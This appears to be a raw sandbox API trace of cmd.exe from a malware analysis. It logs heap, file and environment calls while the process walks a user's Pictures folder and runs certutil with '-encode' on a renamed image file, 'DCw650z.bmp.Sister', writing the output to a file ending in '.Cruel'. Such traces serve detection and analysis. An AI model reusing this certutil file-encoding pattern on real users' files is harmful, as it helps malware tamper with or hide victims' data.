FreeEnvironmentStringsA (penv="=") returned 1 [0296.320] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.321] GetProcessHeap () returned 0x21ed8c70000 [0296.321] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0296.321] GetEnvironmentStringsW () returned 0x21ed8d44630* [0296.321] GetProcessHeap () returned 0x21ed8c70000 [0296.321] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0296.321] FreeEnvironmentStringsA (penv="=") returned 1 [0296.321] GetProcessHeap () returned 0x21ed8c70000 [0296.321] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a40) returned 1 [0296.321] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0296.321] ??_V@YAXPEAX@Z () returned 0x1 [0296.321] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="DCw650z.bmp.Sister", cAlternateFileName="")) returned 1 [0296.321] GetProcessHeap () returned 0x21ed8c70000 [0296.321] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6aca0, Size=0xde) returned 0x21ed8c7c670 [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c670) returned 0xde [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56170 [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56170, Size=0x58) returned 0x21ed8d56170 [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56170) returned 0x58 [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d561e0 [0296.322] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0296.322] GetProcessHeap () returned 0x21ed8c70000 [0296.322] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8890 [0296.322] ??_V@YAXPEAX@Z () returned 0x1 [0296.323] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0296.323] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce20 [0296.323] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0296.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cca0 [0296.323] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0296.324] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdb2e59a5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdb2e59a5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cd00 [0296.324] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0296.324] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\DCw650z.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0264410, ftCreationTime.dwHighDateTime=0x1d5ec5b, ftLastAccessTime.dwLowDateTime=0xd7d8d080, ftLastAccessTime.dwHighDateTime=0x1d5ed43, ftLastWriteTime.dwLowDateTime=0xd7d8d080, ftLastWriteTime.dwHighDateTime=0x1d5ed43, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="DCw650z.bmp.Sister", cAlternateFileName="DCW650~1.SIS")) returned 0x21ed8c7cfa0 [0296.324] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0296.328] _wcsnicmp (_String1="DCW650~1.SIS", _String2="DCw650z.bmp.Sister", _MaxCount=0x12) returned 4 [0296.328] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0296.328] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0296.328] GetProcessHeap () returned 0x21ed8c70000 [0296.328] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45bc0 [0296.328] ??_V@YAXPEAX@Z () returned 0x1 [0296.328] ??_V@YAXPEAX@Z () returned 0x1 [0296.328] GetProcessHeap () returned 0x21ed8c70000 [0296.329] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d561e0, Size=0x1a0) returned 0x21ed8d561e0 [0296.329] GetProcessHeap () returned 0x21ed8c70000 [0296.329] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d561e0) returned 0x1a0 [0296.329] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0296.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.329] GetFileType (hFile=0x50) returned 0x2 [0296.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.329] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0296.330] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.330] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0296.336] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.336] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0296.336] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0296.336] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0296.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.337] GetFileType (hFile=0x50) returned 0x2 [0296.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.337] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0296.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.337] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0296.338] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.338] GetFileType (hFile=0x50) returned 0x2 [0296.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.338] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0296.339] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.339] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d56180*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d56180*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0296.339] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\" ") returned 50 [0296.339] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.339] GetFileType (hFile=0x50) returned 0x2 [0296.339] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.339] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0296.340] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.340] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x32) returned 1 [0296.340] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0296.340] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.340] GetFileType (hFile=0x50) returned 0x2 [0296.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.341] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0296.342] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.342] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0296.347] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0296.348] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0296.348] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0296.348] malloc (_Size=0xffce) returned 0x21eda100000 [0296.348] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0296.348] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0296.348] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0296.348] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0296.348] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0296.348] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0296.348] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0296.348] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0296.349] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0296.349] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0296.349] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0296.349] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0296.349] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0296.349] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0296.349] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0296.349] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0296.349] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0296.349] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0296.349] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0296.349] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0296.349] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0296.349] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0296.349] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0296.349] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0296.349] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0296.349] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0296.349] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0296.349] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0296.349] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0296.349] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0296.349] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0296.349] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0296.350] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0296.351] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0296.351] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0296.351] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0296.351] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0296.351] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0296.351] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0296.352] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0296.352] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0296.352] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0296.352] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0296.352] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0296.352] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0296.352] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0296.352] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0296.352] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0296.352] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0296.352] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0296.352] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0296.352] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0296.352] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0296.352] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0296.352] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0296.352] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0296.352] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0296.352] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0296.352] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0296.352] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0296.352] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0296.352] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0296.352] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0296.352] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0296.353] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0296.353] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0296.353] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0296.353] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0296.353] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0296.353] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0296.353] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0296.353] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0296.353] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0296.353] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0296.353] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0296.353] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0296.353] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0296.353] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0296.353] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0296.353] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0296.353] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0296.353] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0296.353] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0296.353] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0296.353] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0296.353] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0296.353] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0296.353] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0296.354] ??_V@YAXPEAX@Z () returned 0x1 [0296.354] GetProcessHeap () returned 0x21ed8c70000 [0296.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93800f0 [0296.354] GetProcessHeap () returned 0x21ed8c70000 [0296.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x86) returned 0x21ed93796f0 [0296.354] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0296.354] malloc (_Size=0xffce) returned 0x21eda100000 [0296.354] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0296.354] GetProcessHeap () returned 0x21ed8c70000 [0296.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93900e0 [0296.356] SetErrorMode (uMode=0x0) returned 0x0 [0296.356] SetErrorMode (uMode=0x1) returned 0x0 [0296.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93900f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0296.356] SetErrorMode (uMode=0x0) returned 0x1 [0296.356] GetProcessHeap () returned 0x21ed8c70000 [0296.356] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93900e0, Size=0x54) returned 0x21ed93900e0 [0296.356] GetProcessHeap () returned 0x21ed8c70000 [0296.356] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93900e0) returned 0x54 [0296.356] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0296.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0296.356] GetProcessHeap () returned 0x21ed8c70000 [0296.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d644c0 [0296.356] GetProcessHeap () returned 0x21ed8c70000 [0296.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d43470 [0296.357] GetProcessHeap () returned 0x21ed8c70000 [0296.357] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43470, Size=0x1c0) returned 0x21ed8d64860 [0296.357] GetProcessHeap () returned 0x21ed8c70000 [0296.357] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64860) returned 0x1c0 [0296.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.357] GetProcessHeap () returned 0x21ed8c70000 [0296.357] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c72720 [0296.357] GetProcessHeap () returned 0x21ed8c70000 [0296.357] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72720, Size=0x7e) returned 0x21ed8c72720 [0296.357] GetProcessHeap () returned 0x21ed8c70000 [0296.357] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72720) returned 0x7e [0296.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.357] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0296.358] GetLastError () returned 0x2 [0296.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.358] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0296.358] GetLastError () returned 0x2 [0296.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.358] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0296.359] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0296.359] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0296.359] GetLastError () returned 0x2 [0296.359] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0296.359] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0296.359] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0296.359] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0296.359] ??_V@YAXPEAX@Z () returned 0x1 [0296.359] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0296.360] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0296.360] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0296.361] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.361] GetProcessHeap () returned 0x21ed8c70000 [0296.361] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0296.361] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0296.362] _wcsnicmp 